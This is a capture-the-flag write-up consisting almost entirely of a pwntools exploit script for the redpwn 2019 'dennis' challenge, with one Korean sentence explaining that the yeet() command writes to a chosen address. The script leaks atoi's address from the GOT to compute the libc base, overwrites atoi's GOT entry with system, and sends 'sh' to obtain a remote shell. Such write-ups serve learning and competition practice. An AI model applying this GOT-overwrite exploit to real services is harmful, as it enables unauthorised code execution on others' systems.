
yeet()을 통해 원하는 주소에 값을 쓸 수 있다!

from pwn import *

# Connection to the challenge service; every menu helper in this script talks through `s`.
s = remote("chall2.2019.redpwn.net", 4006)

# Local copy of the challenge binary, used for its GOT addresses.
elf = ELF("./dennis")
# Local copy of the libc, used for symbol offsets (atoi, system).
libc = ELF("./libc.so.6")

def greet(size):
	"""Pick menu entry 1, then answer the "greet? : " prompt with *size*.

	*size* is converted with str() before it is sent.
	"""
	s.sendlineafter("Command me: ", "1")
	size_answer = str(size)
	s.sendlineafter("greet? : ", size_answer)

def writ(size):
	"""Pick menu entry 2, then answer the prompt ending in "? : " with *size*.

	*size* is converted with str() before it is sent.
	"""
	s.sendlineafter("Command me: ", "2")
	size_answer = str(size)
	s.sendlineafter("? : ", size_answer)

def yeet():
	"""Pick menu entry 3; this command takes no further input."""
	menu_choice = "3"
	s.sendlineafter("Command me: ", menu_choice)

def eat(content):
	"""Pick menu entry 4, then send *content* in reply to the "Pizza: " prompt.

	*content* is passed through unchanged, so callers may hand in packed bytes.
	"""
	menu_choice = "4"
	s.sendlineafter("Command me: ", menu_choice)
	s.sendlineafter("Pizza: ", content)

def delet():
	"""Pick menu entry 5; this command takes no further input."""
	menu_choice = "5"
	s.sendlineafter("Command me: ", menu_choice)
	

def repeat(content):
	"""Pick menu entry 6, then send *content* once "repeat" shows up in the output."""
	menu_choice = "6"
	s.sendlineafter("Command me: ", menu_choice)
	s.sendlineafter("repeat", content)

def bye():
	"""Pick menu entry 7; this command takes no further input."""
	menu_choice = "7"
	s.sendlineafter("Command me: ", menu_choice)


# Main interaction sequence. The order matters: each step depends on the
# service state left by the previous one.
# NOTE: the script uses Python 2 print statements and will not run unmodified
# on Python 3.

# Stage 1: menu entry 1 with size 32, then send 8 bytes of "Pizza" content:
# the GOT address of atoi followed by the constant 0x0804B050.
# NOTE(review): the page does not explain 0x0804B050; presumably it is an
# address inside ./dennis - confirm against the binary.
greet(32)
eat(p32(elf.got['atoi'])+p32(0x0804B050))
# Menu entry 3. The write-up text says this command is what allows a value to
# be written to a chosen address.
yeet()

# Stage 2: menu entry 2 with size 4, then read 4 bytes back and treat them as
# the runtime address of atoi.
writ(4)
leak = u32(s.recv(4))
print "leak : " + hex(leak)
# libc load base = leaked atoi address minus atoi's offset in the local libc.so.6.
# This is only correct if the local libc.so.6 matches the one the service uses.
libc_base = leak - libc.symbols['atoi']
print "libc_base : " + hex(libc_base)
system = libc_base + libc.symbols['system']
print "system : " + hex(system)

# Stage 3: send the packed address of system as "Pizza" content.
# Presumably this lands in atoi's GOT slot set up in stage 1 - confirm.
# NOTE(review): overwriting a GOT entry requires a writable GOT; full RELRO
# would block this step. The checksec output for ./dennis is not shown here.
eat(p32(system))

# Menu entry 1 again, answering the prompt with "sh" instead of a number.
# Presumably the service passes that answer to atoi, which now resolves to
# system - confirm against the binary.
s.sendlineafter("me: ","1")
s.sendlineafter("?","sh")

# Hand the connection over to the terminal.
s.interactive()

 
